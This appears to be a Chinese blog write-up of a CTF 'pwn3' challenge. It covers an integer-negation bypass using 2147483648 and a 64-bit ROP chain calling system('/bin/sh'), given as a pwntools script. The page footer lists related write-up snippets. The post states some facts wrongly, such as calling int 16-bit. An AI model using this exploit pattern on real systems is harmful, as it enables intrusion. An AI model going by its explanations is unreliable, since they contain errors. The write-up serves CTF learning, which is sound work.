考核PWN的wp(未完待续)

最新推荐文章于 2023-07-13 20:08:07 发布
最新推荐文章于 2023-07-13 20:08:07 发布
阅读量178 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75234353/article/details/130790165
版权

一.pwn3

1.源码分析

 就是要输入一个负数,然后进行num=-num,再判断是否为负数,是的话成功绕过,再进入vuln函数。

 vuln函数给了system函数,但参数需要自己压入栈内。

 我们再去看看num=-num是怎么具体实现的,直接看汇编语言。发现是依靠neg指令来完成的。

2.确定思路

一.前面的num绕过

这里就要讲到计算机内存数值存储方式是补码,何为补码。

https://blog.csdn.net/weixin_44718794/article/details/106252940

自己看链接。

我自己总结一下,方便我以后自己看。

正数的原码,反码,补码都是一样的。

负数的反码:符号位不变,其它取反。

负数的补码:在反码的基础上+1。符号位也在变化范围,但不进位。eg:反码1111,补码0000.

neg指令的了解

https://blog.csdn.net/weixin_42250302/article/details/103432850

总结一下:

在补码的基础下,进行取反(包括符号位),再+1.,符号位也在变化范围内。

怎么绕过

可以看到源码的输入格式为int,int范围为16位,-32768~32767(-2^16~2^16-1)。我们把32767去转换为二进制看看

 得到15位1,也就是说int范围的16位,总会有一位符号位。那我们输入超过这个范围的数。

 例如随便输一个40000,已经超过int的范围了。

 可以看到第一位为1,到系统内存中,就会认为这是符号位,把这个数字认定为负数。可以说第一步就可绕过了。

接下来是绕过neg指令,neg有个点需要注意就是取反后,要+1。重点就是这个+1。

例如我们输入数的二进制为1000,补码为0000,经过neg指令,为10000,可以观察到结果还是为负数。

我们就可以输入2147483648进行绕过

二.压入参数

具体不赘述了。我刚开始做的时候,傻了,被libc迷昏了头,以为调用system函数,必须得知道got表的地址,其实并不然,只需plt即可。

这题,我用plt地址会报错,换为调用system函数地址的地址时,就成功了,离谱(这里有点想不通)。
 

三.计算垃圾字符的偏移量

因为IDA上的偏移量有些时候会不准确,我就尝试去gdb上调试分析,先是cyclic法,发现没有报错地址(也有可能我眼瞎)。又换另外一个方法,输入八个A,发现栈内没有A的回显。我才想起来这是64位的,垃圾字符偏移量是计算八个A到ebp的值。

也就是0x7fffffffdea0到0x7fffffffdec0的距离,计算出的值和IDA也是一样的。

3.exp.py

from pwn import *

context.log_level = "debug"

p = process("./pwn3")
elf = ELF("./pwn3")

sy_addr=0x0000000000401205
pop_rdi=0x000000000040131b
sh=0x00000000004033B0

payload1=b'2147483648'

p.recvuntil('I need a number:')
p.sendline(payload1)

p.recvuntil('Congratulations!')


payload2 = b"A"*40 + p64(pop_rdi)+ p64(sh) + p64(sy_addr)
p.sendline(payload2)

p.interactive()

wbxlzd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2551
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
Pwnwp
weixin_52553215的博客
11-22 708
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
ADworld pwn wp - pwn1
fa1c4的blog
06-26 177
不过问题在于开了canary所以溢出有难度, 不过v6是canary保存的变量, 而且栈位置在s数组的高位, 所以可以通过puts()泄露出canary, puts函数是打印直到’\0’字符为止, 所以溢出可行, 劫持执行流到ROP泄露puts函数地址, 计算出libc基址, 然后调用execve() 这里用one_gadget, 坑点在于记得计算服务器上的execve地址 from pwn import * from pwnlib import context from pwnlib.util.c...
CSTC 部分pwn wp
mishixiaodai的博客
05-05 339
1.bank 直接拖入ida分析,password是由fgets函数读取的,因此当生成的第一个随机数为0xa时,密码就会被截断,即为0xa。 可以发现flag被读入栈中,并且有格式化字符串漏洞,经调试后当输入%8$s时即可读出flag。 编写exp时,因需要爆破,所以当读到flag就用sleep()函数来使程序暂停,exp如下: from pwn import * #io = process('./bank') io = remote('81.70.195.166',10000) context.log
buuctf pwn wp(第一波)无脑AAAA系列
月阴荒的博客
03-20 1002
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上,但是我做了有一会儿了(这篇文章是我把当初做了时的记录素材拿过来做的...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn入门题目汇总.rar
09-01
"pwn"是网络安全领域中的一个术语,全称是"pwnable",通常用于描述与缓冲区溢出、代码注入等技术相关的挑战或比赛。这类问题涉及到计算机系统的内存管理和安全漏洞利用,是逆向工程和信息安全研究的重要部分。本...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
BUUCTF笔记之Pwn部分WP
克格莫
06-07 367
二进制是我的弱项,这里记录一些简单的pwn题。 1.test_your_nc
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1186
ciscn2023华中赛区pwn
ctfshow 基础pwn wp
n1ptune__的博客
05-29 695
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1578
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
祥云杯部分pwnwp
eeeeeight的博客
08-24 1224
lemon 主要问题是2.26版本下, 未控制好指针导致任意写 数据结构如下: lemon_name: lemon_content: 主要可利用的函数是color: 里的buf是指lemon_name结构, 所以可以控制指针lemon_addr的指向了, 因为只能用一次所以想控制整个tcache结构 其它一点可利用的函数: 开头的一次welcome: 虽然是有rand, 但无随机数种子, 所以是固定值, z3一把????! eat函数: 可以打印chunkaddr第四字节, 用于配合后面分配堆块 整
2023上海“磐石行动”pwn wp
m0_63437215的博客
05-23 491
2023上海市大学生网络安全大赛 pwn
2021绿城杯pwn部分wp
eeeeeight的博客
09-29 1164
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
JarvisOJ PWN level系列 wp
苗_的博客
02-09 419
菜菜的小白最近学习pwn,做了Jarvis上的一些题目进行练习,也从很多师傅的博客里学习到了很多新的知识,今天重新温习并且总结一下,以下的wp可能会比较详细,大佬可略: level0 这一题的难度还是蛮容易的,首先拖进ida里,发现有'/bin/sh/字符串和system函数,然后找溢出点,发现read函数这里发生溢出,只给了0x88的内存,但是却要读0x200个字节,必溢出: 然后构造...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wbxlzd

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值